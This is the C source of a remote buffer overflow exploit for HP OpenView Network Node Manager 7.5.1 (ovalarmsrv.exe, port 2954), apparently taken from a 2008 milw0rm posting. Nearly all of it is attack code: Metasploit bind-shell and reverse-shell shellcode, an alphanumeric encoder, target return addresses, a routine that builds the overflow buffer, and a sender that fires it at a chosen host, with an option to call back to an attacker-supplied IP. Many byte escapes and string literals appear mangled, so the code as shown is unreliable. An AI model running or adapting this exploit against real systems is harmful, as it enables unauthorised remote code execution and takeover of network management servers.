HP OpenView NNM v7.5.1 ovalarmsrv.exe Remote Overflow Exploit :

Date : 2008-04-14 Author : Heretic2
/* Dreatica-FXP crew
* 
* ----------------------------------------
* Target         : HP OpenView Network Node Manager v7.5
* ----------------------------------------
* Exploit        : HP OpenView NNM v7.5.1 ovalarmsrv.exe Remote Buffer Overflow Exploit
* Exploit date   : 07.04.2008
* Exploit writer : Heretic2 ([email protected])
* OS             : Windows ALL 
* Crew           : Dreatica-FXP
* Location       : http://www.milw0rm.com/
* ----------------------------------------
* Info           : Vulnerabilty was found by Luigi Auriemma. Sending more than 524 bytes 
*                  to the 2954 port can overflow the EIP register. Too lazy to research the whole 
*                  array of badchars, so simply used the alpahnumeric shellcodes. 
*                  0x00 0x0a 0x20 are bad chars, but i think there are few more.
*                  I only got the ret address for the 7.5.1 version, but 7.5.3 is also vulnerable. 
*                  Using the 2954 port i was not able to determine exact version of HP OV
*                  which runs on the server.
* ----------------------------------------
* Thanks to:
*		1. Luigi Auriemma          ( http://aluigi.org   <aluigi [at] autistici.org> )
*		2. The Metasploit project  ( http://metasploit.com                           ) 
*       3. ALPHA 2: Zero-tolerance ( <skylined [at] edup.tudelft.nl>                 ) 
*		4. Dreatica-FXP crew       (                                                 )
************************************************************************************
* This was written for educational purpose only. Use it at your own risk. Author will be not be 
* responsible for any damage, caused by that code.
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#include <time.h>

#pragma comment(lib,"ws2_32")


void usage(char * s);
void logo();
void end_logo();
void print_info_banner_line(const char * key, const char * val);

void extract_ip_and_port( char * &remotehost, int * port, char * str);
int fill_payload_args(int sh, int bport, char * reverseip, int reverseport, struct h2readyp * xx);

int hr2_connect(char * remotehost, int port, int timeout);
int hr2_udpconnect(char * remotehost, int port,  struct sockaddr_in * addr, int timeout);
int hr2_updsend(char * remotehost, unsigned char * buf, unsigned int len, int port, struct sockaddr_in * addr, int timeout);
int execute(struct _buf * abuf, char * remotehost, int port);

struct _buf 
{
	unsigned char * ptr;
	unsigned int size;
};
int construct_shellcode(int sh, struct _buf * shf, int target, char * reverseip, int reverseport);
int construct_buffer(struct _buf * shf, int target, struct _buf * abuf);




// -----------------------------------------------------------------
// XGetopt.cpp  Version 1.2
// -----------------------------------------------------------------
int getopt(int argc, char *argv[], char *optstring);
char	*optarg;		// global argument pointer
int		optind = 0, opterr; 	// global argv index
// -----------------------------------------------------------------
// -----------------------------------------------------------------


struct {
	const char * name;
	int length;
	char *shellcode;	
}shellcodes[]={ 	
	{  "BindShell on 9998 [                    ]", 
		// alphanumeric encoder took from "ALPHA 2: Zero-tolerance." code
		/*
		* windows/shell_bind_tcp - 
		* http://www.metasploit.com
		* Encoder: generic/none
		*/	
		696,
		"xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49"
		"x49x49x49x49x49x49x49x49x49x49x49x37x51x5ax6ax41"
		"x58x50x30x41x30x41x6bx41x41x51x32x41x42x32x42x42"
		"x30x42x42x41x42x58x50x38x41x42x75x4ax49x69x6cx43"
		"x5ax6ax4bx70x4dx6bx58x59x69x4bx4fx4bx4fx4bx4fx53"
		"x50x4cx4bx32x4cx47x54x77x54x4cx4bx63x75x75x6cx6e"
		"x6bx31x6cx57x75x53x48x76x61x7ax4fx6ex6bx32x6fx56"
		"x78x6cx4bx61x4fx51x30x56x61x78x6bx32x69x6cx4bx44"
		"x74x4cx4bx46x61x38x6ex74x71x6bx70x6fx69x4ex4cx6f"
		"x74x4bx70x51x64x77x77x39x51x78x4ax64x4dx45x51x59"
		"x52x58x6bx4cx34x65x6bx70x54x77x54x64x68x71x65x7a"
		"x45x4ex6bx73x6fx45x74x53x31x5ax4bx33x56x4cx4bx56"
		"x6cx52x6bx6ex6bx33x6fx35x4cx67x71x7ax4bx74x43x36"
		"x4cx6ex6bx6bx39x30x6cx64x64x55x4cx33x51x79x53x66"
		"x51x6bx6bx51x74x6cx4bx70x43x56x50x4cx4bx51x50x54"
		"x4cx6cx4bx34x30x35x4cx6cx6dx4cx4bx53x70x63x38x71"
		"x4ex72x48x4cx4ex70x4ex64x4ex58x6cx72x70x59x6fx69"
		"x46x51x76x70x53x31x76x50x68x35x63x56x52x31x78x52"
		"x57x73x43x74x72x71x4fx56x34x69x6fx4ex30x35x38x7a"
		"x6bx7ax4dx6bx4cx35x6bx70x50x49x6fx68x56x71x4fx6e"
		"x69x4dx35x30x66x4fx71x5ax4dx45x58x75x52x33x65x32"
		"x4ax77x72x79x6fx7ax70x71x78x79x49x77x79x6cx35x4e"
		"x4dx33x67x49x6fx6bx66x50x53x62x73x53x63x46x33x50"
		"x53x31x53x51x43x43x73x70x53x4bx4fx6ax70x33x56x70"
		"x68x74x67x64x4ex63x56x31x43x4dx59x4bx51x4dx45x33"
		"x58x4cx64x36x7ax70x70x4bx77x56x37x6bx4fx4ex36x73"
		"x5ax56x70x70x51x70x55x4bx4fx4ax70x73x58x4dx74x4c"
		"x6dx76x4ex38x69x66x37x6bx4fx6bx66x52x73x50x55x4b"
		"x4fx58x50x65x38x4bx55x43x79x4fx76x62x69x51x47x59"
		"x6fx38x56x42x70x50x54x32x74x51x45x79x6fx78x50x6e"
		"x73x31x78x79x77x52x59x4fx36x73x49x62x77x4bx4fx78"
		"x56x61x45x4bx4fx5ax70x52x46x50x6ax71x74x50x66x52"
		"x48x61x73x52x4dx4bx39x6bx55x51x7ax72x70x76x39x77"
		"x59x5ax6cx6cx49x59x77x42x4ax70x44x4cx49x58x62x50"
		"x31x49x50x6bx43x4cx6ax6bx4ex43x72x34x6dx4bx4ex51"
		"x52x44x6cx5ax33x4ex6dx52x5ax35x68x4ex4bx4cx6bx4e"
		"x4bx30x68x52x52x59x6ex6fx43x32x36x4bx4fx42x55x70"
		"x44x6bx4fx6bx66x43x6bx71x47x72x72x43x61x70x51x52"
		"x71x70x6ax77x71x72x71x36x31x42x75x72x71x4bx4fx4a"
		"x70x75x38x6cx6dx58x59x47x75x7ax6ex52x73x59x6fx7a"
		"x76x30x6ax69x6fx49x6fx70x37x4bx4fx78x50x4ex6bx53"
		"x67x59x6cx4fx73x38x44x70x64x59x6fx4bx66x52x72x49"
		"x6fx48x50x43x58x7ax50x6fx7ax45x54x53x6fx70x53x4b"
		"x4fx6ax76x69x6fx5ax70x41"

	},
	{  "ReverseShell      [ args: -R <ip:port> ]", 
		287,
		/*
		* windows/shell_reverse_tcp - 287 bytes
		* http://www.metasploit.com
		* Encoder: generic/none	
		*/	
		"xfcx6axebx4dxe8xf9xffxffxffx60x8bx6cx24x24x8b"
		"x45x3cx8bx7cx05x78x01xefx8bx4fx18x8bx5fx20x01"
		"xebx49x8bx34x8bx01xeex31xc0x99xacx84xc0x74x07"
		"xc1xcax0dx01xc2xebxf4x3bx54x24x28x75xe5x8bx5f"
		"x24x01xebx66x8bx0cx4bx8bx5fx1cx01xebx03x2cx8b"
		"x89x6cx24x1cx61xc3x31xdbx64x8bx43x30x8bx40x0c"
		"x8bx70x1cxadx8bx40x08x5ex68x8ex4ex0execx50xff"
		"xd6x66x53x66x68x33x32x68x77x73x32x5fx54xffxd0"
		"x68xcbxedxfcx3bx50xffxd6x5fx89xe5x66x81xedx08"
		"x02x55x6ax02xffxd0x68xd9x09xf5xadx57xffxd6x53"
		"x53x53x53x43x53x43x53xffxd0x68x7fx00x00x01x66"
		"x68x11x5cx66x53x89xe1x95x68xecxf9xaax60x57xff"
		"xd6x6ax10x51x55xffxd0x66x6ax64x66x68x63x6dx6a"
		"x50x59x29xccx89xe7x6ax44x89xe2x31xc0xf3xaax95"
		"x89xfdxfex42x2dxfex42x2cx8dx7ax38xabxabxabx68"
		"x72xfexb3x16xffx75x28xffxd6x5bx57x52x51x51x51"
		"x6ax01x51x51x55x51xffxd0x68xadxd9x05xcex53xff"
		"xd6x6axffxffx37xffxd0x68xe7x79xc6x79xffx75x04"
		"xffxd6xffx77xfcxffxd0x68xf0x8ax04x5fx53xffxd6"
		"xffxd0"
	},
	{NULL, 0, NULL}
};


 
struct _target{
	const char *t ;
	unsigned long ret, fix ;
} targets[]=
{	
	{"HP OpenView Network Node Manager  v7.5.1", 0x5a01d78d, 0x5a04d3d0 },
	{"DOS/Crash/Debug/Test/Fun",                 0x41414141, 0x41414141 },
	{NULL,                                       0x00000000, 0x00000000 }
};




// memory for buffers
unsigned char payloadbuffer[10000], a_buffer[10000];
long dwTimeout=5000;
int timeout=5000;


// alphanumeric decoder took from "ALPHA 2: Zero-tolerance." code
char alphanum_decoder[] = 
		"xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49"
		"x49x49x49x49x49x49x49x49x49x49x49x37x51x5ax6ax41"
		"x58x50x30x41x30x41x6bx41x41x51x32x41x42x32x42x42"
		"x30x42x42x41x42x58x50x38x41x42x75x4ax49";
// alphanumeric encoder took from "ALPHA 2: Zero-tolerance." code
int alphanumeric_exec(char *to_encode, int len, char *encoded, int * rlen )
{
	int   i,ii=0, input, A, B, C, D, E, F, length=(int)strlen(to_encode);
	char* valid_chars = "0123456789BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"; // mixed chars
	char temp[10];
	memset(temp, 0 , sizeof(temp));	
	srand((int)clock());  
	for(ii=0;ii<len;ii++)
	{
		input = to_encode[ii];
		A = (input & 0xf0) >> 4;
		B = (input & 0x0f);
		F = B;
		i = rand() % ((int)strlen(valid_chars));
		while ((valid_chars[i] & 0x0f) != F) { i = ++i % ((int)strlen(valid_chars)); }
		E = valid_chars[i] >> 4;
		D = (A^E);
		i = rand() % ((int)strlen(valid_chars));
		while ((valid_chars[i] & 0x0f) != D) { i = ++i % ((int)strlen(valid_chars)); }
		C = valid_chars[i] >> 4;
		sprintf(temp,"%c%c", (C<<4)+D, (E<<4)+F);
		encoded[strlen(encoded)]=temp[0];
		encoded[strlen(encoded)]=temp[1];
	}
	encoded[strlen(encoded)]='A';
	*rlen=(int)strlen(encoded);
	return 1;

}


int main(int argc, char **argv)
{
	char c,*remotehost=NULL,*file=NULL,*reverseip=NULL,*url=NULL,temp1[100];
	int HAVE_R=0,HAVE_U=0,sh,port=2954,itarget=0,reverseport=9999;
	struct _buf  fshellcode, sbuffer;

	logo();
	if(argc<2)
	{
		usage(argv[0]);		
		return -1;
	}

	WSADATA wsa;
	WSAStartup(MAKEWORD(2,0), &wsa);
	// set defaults
	sh=0;	
	// ------------	
	
	while((c = getopt(argc, argv, "h:t:R:T:"))!= EOF)
	{
		switch (c)
		{
			case 'h':
				if (strchr(optarg,':')==NULL)
				{
					remotehost=optarg;
				}else 
				{
					sscanf(strchr(optarg,':')+1, "%d", &port);
					remotehost=optarg;
					*(strchr(remotehost,':'))='';
				}
				break; 				
			case 't':
				sscanf(optarg, "%d", &itarget);
				itarget--;
				break;
			case 'R':
				HAVE_R=1;
				if (strchr(optarg,':')==NULL)
				{
					reverseip=optarg;
				}else 
				{
					sscanf(strchr(optarg,':')+1, "%d", &reverseport);
					reverseip=optarg;
					*(strchr(reverseip,':'))='';
				}
				break;			
			case 'T':				
				sscanf(optarg, "%ld", &dwTimeout);
				break; 			
			default:
	            usage(argv[0]);
				WSACleanup();
			return -1;
		}		
	}	
	sh=HAVE_R;

	if(remotehost == NULL)
	{
		printf("   [-] Please enter remotehost
");
		end_logo();
		WSACleanup();
		return -1;
	}
	print_info_banner_line("Host", remotehost);
	sprintf(temp1, "%d", port);
	print_info_banner_line("Port", temp1);
	print_info_banner_line("Payload", shellcodes[sh].name);

	if(sh==0)
	{		
		sprintf(temp1, "%d", 9998);
		print_info_banner_line("BINDPort", temp1);
	}
	if(sh==1)
	{
		print_info_banner_line("CB IP", reverseip);
		sprintf(temp1, "%d", reverseport);
		print_info_banner_line("CB port", temp1);
	}
	printf(" # ------------------------------------------------------------------- # 
");
	fflush(stdout);


	memset(payloadbuffer, 0, sizeof(payloadbuffer));
	fshellcode.ptr=payloadbuffer;
	fshellcode.size=0;	

	memset(a_buffer, 0, sizeof(a_buffer));
	sbuffer.ptr=a_buffer;
	sbuffer.size=0;

	if(!construct_shellcode(sh, &fshellcode, itarget, reverseip, reverseport))
	{
		end_logo();
		WSACleanup();
		return -1;
	}

	printf("   [+] Payload constructed
");
	
	if(!construct_buffer(&fshellcode, itarget, &sbuffer))
	{
		printf("   [-] Buffer not constructed
");
		end_logo();
		WSACleanup();
		return -1;
	}
	printf("   [+] Final buffer constructed
");
	

	if(!execute(&sbuffer, remotehost, port))
	{
		printf("   [-] Buffer not sent
");
		end_logo();
		WSACleanup();
		return -1;
	}
	printf("   [+] Buffer sent
");
	
	end_logo();
	WSACleanup();
	return 0;
}

int construct_shellcode(int sh, struct _buf * shf, int target, char * rerverseip, int reverseport)
{
	int x;
	char fsh[1000];

	memcpy(shf->ptr, shellcodes[sh].shellcode, shellcodes[sh].length);
	shf->size=shellcodes[sh].length;
	if(sh==1)
	{		
		memset(shf->ptr,0,shf->size+1);
		memset(fsh,0,sizeof(fsh));
		memcpy(fsh, shellcodes[sh].shellcode, shellcodes[sh].length);
		

		static struct hostent *host = gethostbyname(rerverseip);
		static struct sockaddr_in addr;
		if(host == NULL)
		{
			printf("   [-] Reverse ip/hostanme is invalid
");
			return 0;
		}

		addr.sin_addr = *(struct in_addr*)host->h_addr;
		fsh[160] = (addr.sin_addr.S_un.S_un_b.s_b1) ;
		fsh[161] = (addr.sin_addr.S_un.S_un_b.s_b2) ;
		fsh[162] = (addr.sin_addr.S_un.S_un_b.s_b3) ;
		fsh[163] = (addr.sin_addr.S_un.S_un_b.s_b4) ;
        
		fsh[166] = ((reverseport >> 8) & 0xff) ;
		fsh[167] = ((reverseport     ) & 0xff) ;	
		
		memcpy(shf->ptr,alphanum_decoder,sizeof(alphanum_decoder)-1);
		alphanumeric_exec(fsh, shellcodes[sh].length, (char*)(shf->ptr+sizeof(alphanum_decoder)-1), &x);
		shf->size = sizeof(alphanum_decoder)-1+x;
	}
	return 1;
}


int construct_buffer(struct _buf * shf, int target, struct _buf * sbuf)
{
	unsigned char * cp = sbuf->ptr;

		// ctl command
	*cp++='6';
	*cp++='2';
	*cp++=' ';

		// overflow
	memset(cp, 'b', 516);
	cp+=516;	

		// EIP
	*cp++ = (char)((targets[target].ret      ) & 0xff);
	*cp++ = (char)((targets[target].ret >>  8) & 0xff);
	*cp++ = (char)((targets[target].ret >> 16) & 0xff);
	*cp++ = (char)((targets[target].ret >> 24) & 0xff);

		// Fix
	*cp++ = (char)((targets[target].fix      ) & 0xff);
	*cp++ = (char)((targets[target].fix >>  8) & 0xff);
	*cp++ = (char)((targets[target].fix >> 16) & 0xff);
	*cp++ = (char)((targets[target].fix >> 24) & 0xff);

		// JFF
	*cp++ = 'x90';
	*cp++ = 'x90';
	*cp++ = 'x90';
	*cp++ = 'x90';

		// shellcode
	memset(cp, 'x41', 1000);		
	memcpy(cp, shf->ptr, shf->size);
	cp+=1000;		
	
	sbuf->size=(int)(cp-sbuf->ptr);
	return 1;
}


void extract_ip_and_port( char * &remotehost, int * port, char * str)
{
	if (strchr(str,':')==NULL)
	{
		remotehost=str;
	}else 
	{
		sscanf(strchr(str,':')+1, "%d", port);
		remotehost=str;
		*(strchr(remotehost,':'))='';
	}
}



int hr2_connect(char * remotehost, int port, int timeout)
{
	SOCKET s;
	struct hostent *host;
	struct sockaddr_in addr;
	TIMEVAL stTime;
	TIMEVAL *pstTime = NULL;
	fd_set x;
	int res;

	if (INFINITE != timeout) 
	{
	    stTime.tv_sec = timeout / 1000;
	    stTime.tv_usec = timeout % 1000;
	    pstTime = &stTime;
	}

	host = gethostbyname(remotehost);
	if (!host) return SOCKET_ERROR;

	addr.sin_addr = *(struct in_addr*)host->h_addr;
	addr.sin_port = htons(port);
	addr.sin_family = AF_INET;

	s = socket(AF_INET, SOCK_STREAM, 0);
	if (s == SOCKET_ERROR)
	{
		closesocket(s);
		return SOCKET_ERROR;
	}

	unsigned long l = 1;
	ioctlsocket( s, FIONBIO, &l ) ;

	connect(s, (struct sockaddr*)&addr, sizeof(addr));

	FD_ZERO(&x);
	FD_SET(s, &x);

	res = select(NULL,NULL,&x,NULL,pstTime);
	if(res< 0) return SOCKET_ERROR;
	if(res==0) return 0;
	return (int)s;
}


int hr2_tcpsend(SOCKET s, unsigned char * buf, unsigned int len, int timeout)
{
	return send(s, (char *)buf, len, 0);
}

int hr2_tcprecv(SOCKET s, unsigned char * buf, unsigned int len, int timeout)
{
	TIMEVAL stTime;
	TIMEVAL *pstTime = NULL;
	fd_set xy;
	int res;

	if (INFINITE != timeout) 
	{
	    stTime.tv_sec = timeout / 1000;
	    stTime.tv_usec = timeout % 1000;
	    pstTime = &stTime;
	}
	FD_ZERO(&xy);
	FD_SET(s, &xy);
	
	res = select(NULL,&xy,NULL,NULL,pstTime);

	if(res==0) return 0;
	if(res<0) return -1;

	return recv(s, (char *)buf, len, 0);
}

int execute(struct _buf * abuf, char * remotehost, int port)
{
	int x;
	SOCKET s ;

	s = hr2_connect(remotehost, port, 10000);
	if(s==0)
	{
		printf("   [-] connect() timeout
");
		return 0;
	}
	if(s==SOCKET_ERROR)
	{
		printf("   [-] Connection failed
");
		return 0;
	}		
	x = hr2_tcpsend(s, abuf->ptr, abuf->size, 0);
	printf("   [+] Sent %d out of %d bytes
", x, abuf->size);

	closesocket(s);
	return 1;
}

// -----------------------------------------------------------------
// XGetopt.cpp  Version 1.2
// -----------------------------------------------------------------
int getopt(int argc, char *argv[], char *optstring)
{
	static char *next = NULL;
	if (optind == 0)
		next = NULL;

	optarg = NULL;

	if (next == NULL || *next == '')
	{
		if (optind == 0)
			optind++;

		if (optind >= argc || argv[optind][0] != '-' || argv[optind][1] == '')
		{
			optarg = NULL;
			if (optind < argc)
				optarg = argv[optind];
			return EOF;
		}

		if (strcmp(argv[optind], "--") == 0)
		{
			optind++;
			optarg = NULL;
			if (optind < argc)
				optarg = argv[optind];
			return EOF;
		}

		next = argv[optind];
		next++;		// skip past -
		optind++;
	}

	char c = *next++;
	char *cp = strchr(optstring, c);

	if (cp == NULL || c == ':')
		return '?';

	cp++;
	if (*cp == ':')
	{
		if (*next != '')
		{
			optarg = next;
			next = NULL;
		}
		else if (optind < argc)
		{
			optarg = argv[optind];
			optind++;
		}
		else
		{
			return '?';
		}
	}

	return c;
}
// -----------------------------------------------------------------
// -----------------------------------------------------------------
// -----------------------------------------------------------------


void print_info_banner_line(const char * key, const char * val)
{
	char temp1[100], temp2[100];

	memset(temp1,0,sizeof(temp1));	
	memset(temp1, 'x20' , 58 - strlen(val) -1);	

	memset(temp2,0,sizeof(temp2));
	memset(temp2, 'x20' , 8 - strlen(key));	
	printf(" #  %s%s: %s%s# 
", key, temp2, val, temp1);	

}



void usage(char * s)
{	
	int j;
	printf("
");
	printf("    Usage: %s -h <host:port> -t <target> -R <ip:port>
", s);
	printf("   -------------------------------------------------------------------
");
	printf("    Arguments:
");
	printf("      -h ........ host to attack, default port: 2954
");
	printf("      -t ........ target to use
");	
	printf("      -R ........ set reverse IP and port ( e.g. -R 192.168.0.11:9999 )
");
	printf("      -T ........ socket timeout
");
	printf("
");
	printf("    Supported HP NNM versions:
");
	for(j=0; targets[j].t!=0;j++)
	{
		printf("      %d. %s
",j+1, targets[j].t);
	}					
	printf("
");
	for(j=0; shellcodes[j].name!=0;j++)
	{
		printf("      %d. %s
",j+1, shellcodes[j].name);
	}		
	end_logo();	
}

void logo()
{
	printf("

");
	printf(" ####################################################################### 
");	
	printf(" #     ____                 __  _                  ______  __    _____ #
");
	printf(" #    / __ \________  _____/ /_(_)_________       / __/\ \/ /   / _  / #
");
	printf(" #   / / / / ___/ _ \/ __ / __/ / ___/ __ / ___  / /    \  /   / // /  #
");
	printf(" #  / /_/ / / /  ___/ /_// /_/ / /__/ /_// /__/ / _/    /  \  / ___/   #
");
	printf(" # /_____/_/  \___/ \_,_/\__/_/\___/\__,_/     /_/     /_/\_\/_/       #
");
	printf(" #                                 crew                                #
");
	printf(" ####################################################################### 
");	
	printf(" #  Exploit : HP OpenView NNM v7.5.1 ovalarmsrv.exe Remote Exploit     # 
");
	printf(" #  Author  : Heretic2                                                 # 
");
	printf(" #  THANKS  : Luigi Auriemma, Metasploit, skylined                     # 
");
	printf(" #  Research: Luigi Auriemma                                           # 
");
	printf(" #  Version : 1.0                                                      # 
");
	printf(" #  System  : Windows ALL                                              # 
");
	printf(" #  Date    : 07.04.2008                                               # 
");
	printf(" # ------------------------------------------------------------------- # 
");
}

void end_logo()
{
	printf(" # ------------------------------------------------------------------- # 
");
	printf(" #                    Dreatica-FXP crew [Heretic2]                     # 
");	
	printf(" ####################################################################### 

");
}

// milw0rm.com [2008-04-14]

C1

 

C2

 

C3